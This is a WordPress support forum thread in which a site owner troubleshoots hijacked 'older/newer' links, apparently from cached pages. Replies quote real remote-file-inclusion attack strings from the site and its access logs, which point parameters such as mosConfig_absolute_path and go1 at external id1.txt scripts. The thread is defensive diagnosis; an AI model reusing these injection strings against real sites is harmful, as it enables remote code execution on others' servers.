WordPress.org

Support

Support » How-To and Troubleshooting » wp 2.9.1 sophisticated hack

wp 2.9.1 sophisticated hack

  • navigadget
    Member

    @navigadget

    I’m using the latest version of WP and my site is hacked. I can not figure out how they got in. Details:

    • older, newer page links at the bottom of the page are hijacked (see image url)
    • doesn’t show hijacked links once I login as admin
    • after i login as admin then logout, never shows up hijacked link
    • looked at timestamps via ftp as much as I could; nothing
    • installed exploit scanner; nothing
    • grepped for base64 and eval text in my database file and all other files; nothing
    • see it here: http://imgur.com/2zqDb.jpg

    Please help. I do not know for how long this has been going on…

Viewing 7 replies - 1 through 7 (of 7 total)
  • Clayton James
    Participant

    @claytonjames

    This is what I get on rollover on the very same link on your site.

    //www.yoursite.com/?_REQUEST%5Boption%5D=com_content&_REQUEST%5BItemid%5D=1&GLOBALS&mosConfig_absolute_path=http%3A%2F%2Fqqe.ru%2Fforum%2FSmileys%2Fid1.txt%3F%3F

    //qqe.ru/forum/Smileys/id1.txt

    Search this string in Google for info: echo("Shiro"."Hige") -or- this “id1.txt”

    This may also be a relevant information.

    Anything telling in your access logs?

    navigadget
    Member

    @navigadget

    What should I look for in access logs? I’m not very good this. I see he is using some “go1” to pass the URL in my access logs:

    [23/Jan/2010:01:30:38 -0600] “GET /?go1=http://pivot-e-solutions.com/includes/domit/id1.txt?? HTTP/1.1” 403 54923 “-” “Mozilla/5.0”

    And there’s some php code there. I searched all my files for “go1” but nothing came up. I searched for go1 using exploit scanner; one hit was something like this:

    Blocker Filesystem pattern scan Found string go1 [ABSPATH]/wp-content/cache/wp-cache-7ef8f7e1c52df0895d36dd2b3ef0ed41.html:267
    Context

    href=”http://www.mysite.com/index.php/page/2?go1=http%3A%2F%2Fpivot-e-solutions.com%2Fincludes%2Fdomit%2Fid1.txt” ><span class=’older’>Older Entries</span> </div>

    Clayton James
    Participant

    @claytonjames

    It may be worth seeking advice or information from your host first. Perhaps they have dealt with the issue before and can offer some guidance.
    I’m guessing you might be on a shared server, so they may have, or want information relative to your issue. Other than that, there are tons of links and “how to” on cleaning up a hacked site.

    FAQ My site was hacked

    themaclady
    Member

    @themaclady

    I”m still having a problem with hidden users. After upgrading to 2.9.1 I’m not sure I’ve cleaned out the user in the DB.

    I upgraded and the user showed up in the Users panel… deleted.

    Deleted DB and made new one and re-uploaded the saved DB file.

    Site is working again but not sure I got rid of the ID, although something in My PHP Admin told me to delete user_id2 which I did….

    Not sure what I clicked on to bring that up but posts now do not have spam words in the Google alert. Can’t see the purpose of this hack — the link still goes to the blog, the words don’t show up anyplace…???

    navigadget
    Member

    @navigadget

    I’ve realized the hijacked links were the cached ones and that’s probably why they wouldn’t show up once I logged in.

    I do not have any reason to believe wp-super-cache plugin was the problem but once got rid of that plugin completely my links look normal (maybe clayton can check again 🙂

    I hate how I still do not know what files/database entries are/were causing this.

    texxs
    Participant

    @texxs

    ahh http://redtideflorida.org/pages in case you were wondering . . .

    texxs
    Participant

    @texxs

    crap sorry wrong discusion I was at a very similiar discussion at:
    http://wordpress.org/support/topic/357635?replies=9#post-1431225

Viewing 7 replies - 1 through 7 (of 7 total)
  • The topic ‘wp 2.9.1 sophisticated hack’ is closed to new replies.